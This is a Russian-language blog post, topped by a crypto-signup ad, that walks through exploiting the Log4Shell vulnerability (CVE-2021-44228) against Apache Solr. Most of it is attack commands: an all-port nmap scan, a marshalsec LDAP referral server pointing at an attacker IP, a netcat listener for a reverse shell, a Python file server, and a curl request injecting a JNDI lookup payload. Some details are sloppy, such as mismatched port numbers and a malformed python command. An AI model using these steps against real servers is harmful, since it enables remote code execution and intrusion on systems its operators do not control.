Получи случайную криптовалюту за регистрацию!

Уязвимость log4j или же CVE-2021-44228 Всем Асап. спустя меся | Hacked by Python

Уязвимость log4j или же CVE-2021-44228
Всем Асап. спустя месяц не активности я возвращаюсь, чтобы поведать вам о том как 9 декабря мир информационных технологий узнал о новой уязвимости, которая затрагивает пакет ведения журналов log4j. Эта уязвимость получила оценку серьезности 10,0 (наиболее критическая оценка) и предлагает удаленное выполнение простого удаленного кода на хостах, использующих программное обеспечение, использующее эту log4jверсию. Эта атака получила название «Log4Shell».

Небольшое примечание. В настоящий момент крайне важно сделать интернет более безопасным. Если у Вас есть шанс рассказать об этой уязвимости своим знакомым или друзьям у которых есть свои it проекты, Вам следует сделать это. Уязвимость очень актуальна и в плохих руках представляет реальную угрозу. Только мы способны это исправить.

Уязвимость может располагаться на сервисах, которые находятся на достаточно необычных портах. Поэтому для сканирования с nmap имеет смысл написать команду -р-, чтобы просканировать все порты.

Например в моем случае это был Solr Apache с портом 8989.

Формат полезной нагрузки выглядит так: ${jndi:ldap://ATTACKERCONTROLLEDHOST}
Нам понадобится LDAP сервер для перенаправления запроса жертвы на другое место, где можно будет разместить нашу полезную нагрузку.

Давайте приготовим все для выполнения данной уязвимости.
1. Git clone https://github.com/mbechler/marshalsec
2. Sudo apt install maven
3. А, и ещё, ваша версия java должна быть 8. Какая именно сказать не могу.
4. Внутри marshalsec пишем mvn clean package -DskipTests
5. java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://YOUR.ATTACKER.IP.ADDRESS:8000/#Exploit"
И наш ldap готов.

Теперь включим прослушивание порта с netcat и запустим питон сервер.
1. nc -lvnp 9001
2. python 3 -m http.server 8080

Наконец, все, что осталось сделать, это активировать эксплойт и активировать наш синтаксис JNDI! Обратите внимание на изменения в номере порта (теперь это относится к нашему серверу LDAP) и в ресурсе, который мы извлекаем, с указанием нашего эксплойта: curl 'http://MACHINE_IP:8983/solr/admin/cores?foo=$\{jndi:ldap://YOUR.ATTACKER.IP.ADDRESS:1389/Exploit\}

Так, говорю сразу, ваша полезная нагрузка может отличаться очень сильно. Поэтому у вас все может выглядеть иначе. Выше я говорил что тестил все на solr apache.

Ну вроде как, это все. Я не добавил пару вещей и если попросите, я сделаю вторую часть. Спасибо, что до читали до конца.